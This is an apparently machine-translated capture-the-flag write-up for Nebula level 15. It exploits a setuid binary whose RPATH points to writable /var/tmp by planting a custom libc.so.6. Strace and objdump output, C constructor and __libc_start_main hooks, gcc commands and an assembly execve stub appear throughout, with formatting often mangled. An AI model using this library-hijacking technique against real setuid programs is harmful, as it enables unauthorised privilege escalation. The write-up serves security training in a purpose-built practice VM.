Linux dynamic link library Inclusion Vulnerability

Linux dynamic link library Inclusion Vulnerability

1. Description

Nebula is a virtual machine used to exercise privilege escalation in Linux. Its 15th level Level15 provides such a vulnerable program flag15

 

sh-4.2$ ls -ltotal 7-rwsr-x--- 1 flag15 level15 7161 2011-11-20 21:22 flag15sh-4.2$ whoamilevel15

 

The setuid program vulnerability must be exploited to escalate permissions from level15 to flag15 and execute/bin/getflag.

2. Vulnerability Mining

This is a classic dynamic link library hijacking question. First, use strace to observe flag15

 

execve("./flag15", ["./flag15"], [/* 19 vars */]) = 0brk(0)                                  = 0x880e000access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)5/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)stat64("/var/tmp/flag15/i686/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)stat64("/var/tmp/flag15/i686/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)stat64("/var/tmp/flag15/i686", 0xbfe0f594) = -1 ENOENT (No such file or directory)open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)stat64("/var/tmp/flag15/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)stat64("/var/tmp/flag15/sse2", 0xbfe0f594) = -1 ENOENT (No such file...open("/var/tmp/flag15/libc.so.6", O_RDONLY) = 3...exit_group(63)                          = ?

 

The link to the program named libc is found. the dynamic link library of so.6, but the/var/tmp directory is writable to the current user (level15). Therefore, you can write a customized libc under this directory. so.6 for program flag15 Link

 

We further checked the header information of flag15 and found that it does depend on lib. so.6, which is compiled using RPATH, indicates that flag15 searches for the path containing the dynamic link library at runtime/var/tmp/flag15, in addition, setuid execution is allowed (if LD_PRELOAD is used for compilation, setuid execution is not allowed ).

 

sh-4.2$ objdump -p /home/flag15/flag15/home/flag15/flag15:     file format elf32-i386Program Header:    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2         filesz 0x00000120 memsz 0x00000120 flags r-x  INTERP off    0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0         filesz 0x00000013 memsz 0x00000013 flags r--    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12         filesz 0x000005d4 memsz 0x000005d4 flags r-x    LOAD off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12         filesz 0x00000108 memsz 0x00000110 flags rw- DYNAMIC off    0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2         filesz 0x000000d0 memsz 0x000000d0 flags rw-    NOTE off    0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2         filesz 0x00000044 memsz 0x00000044 flags r--EH_FRAME off    0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2         filesz 0x00000034 memsz 0x00000034 flags r--   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2         filesz 0x00000000 memsz 0x00000000 flags rw-   RELRO off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0         filesz 0x000000f4 memsz 0x000000f4 flags r--Dynamic Section:  NEEDED               libc.so.6  RPATH                /var/tmp/flag15  INIT                 0x080482c0  FINI                 0x080484ac  GNU_HASH             0x080481ac  STRTAB               0x0804821c  SYMTAB               0x080481cc  STRSZ                0x0000005a  SYMENT               0x00000010  DEBUG                0x00000000  PLTGOT               0x08049ff4  PLTRELSZ             0x00000018  PLTREL               0x00000011  JMPREL               0x080482a8  REL                  0x080482a0  RELSZ                0x00000008  RELENT               0x00000008  VERNEED              0x08048280  VERNEEDNUM           0x00000001  VERSYM               0x08048276Version References:  required from libc.so.6:    0x0d696910 0x00 02 GLIBC_2.0

 

3. Vulnerability Exploitation

The rest is to write our customized libc. so.6 in the/var/tmp/flag15 directory, hijack flag15, and escalate the permission to run/bin/getflag.

First, hook the functions used during the flag15 operation. There are two points to choose from. first, declare your own function through the gcc _ attribute (constructor) modifier. This function can complete the Elevation of Privilege function before the linux dynamic link library entry _ init function; second, add your own permission escalation function to the int _ libc_start_main function.

Use the first method to write:

 

sh-4.2$ cat constructor.c #include <stdio.h>void __attribute ((constructor)) init(){    system("/bin/getflag");}

 

Compile

gcc -shared -fPIC -o libc.so.6 constructor.c

 

Method 2

 

sh-4.2$ cat shell.c #include <unistd.h>int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {      system("/bin/getflag");}

 

Compile

gcc -shared -fPIC -o libc.so.6 shell.c

Obtain libc. so.6.

Then execute

 

sh-4.2$ /home/flag15/flag15/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference

 

The above prompt shows that a _ cxa_finalize function is missing, so you can add both constructor. c and shell. c in the above two methods.

 

void __cxa_finalize(void){    return;}

 

Change constructor. c to contructor1.c, and then compile again

sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c

Then execute

sh-4.2$ /home/flag15/flag15/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

 

The above prompt shows that the version information of GLIBC is missing. Therefore, we provide a version script used during compilation.

Continue compilation and execution

sh-4.2$ cat version GLIBC_2.0 {};sh-4.2$  gcc -shared -fPIC -o libc.so.6   contructor1.c -Wl,--version-script=version  sh-4.2$ /home/flag15/flag15/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

 

An error is still prompted, and the system function does not appear to be found. There are two methods to solve this problem. One is to compile it in the form of a static link library to satisfy all dependencies (why ?), Second, compile your own system functions in assembly language

Method 1:

sh-4.2$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 contructor1.c sh-4.2$ /home/flag15/flag15You have successfully executed getflag on a target account/home/flag15/flag15: relocation error: /home/flag15/flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

 

 

Method 2:

 

sh-4.2$ cat shell.c #include <unistd.h>void __cxa_finalize(void *d) {}int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {      system();}

 

 

Sh-4.2 $ cat system. s. section. text. globl systemsystem: mov $ getflag, % ebxxor % edx, % edxpush % ebxmov % esp, % ecxmov $11, % eax; execve system calls int $0x80. section. datagetflag :. ascii "/bin/getflag \ 0" sh-4.2 $ gcc-shared-fPIC-o libc. so.6 shell. c system. s-Wl, -- version-script = version sh-4.2 $/home/flag15/flag15 You have successfully executed getflag on a target account

 

I personally think that the shellcode compilation method is easier to understand than the static Link Library compilation method. At present, I have not figured out why the static link method can solve the problem of system functions.

Reference

Www.pwntester.com/blog/2013/11/26/nebula-level15-write-up/

Https://github.com/1u4nx/Exploit-Exercises-Nebula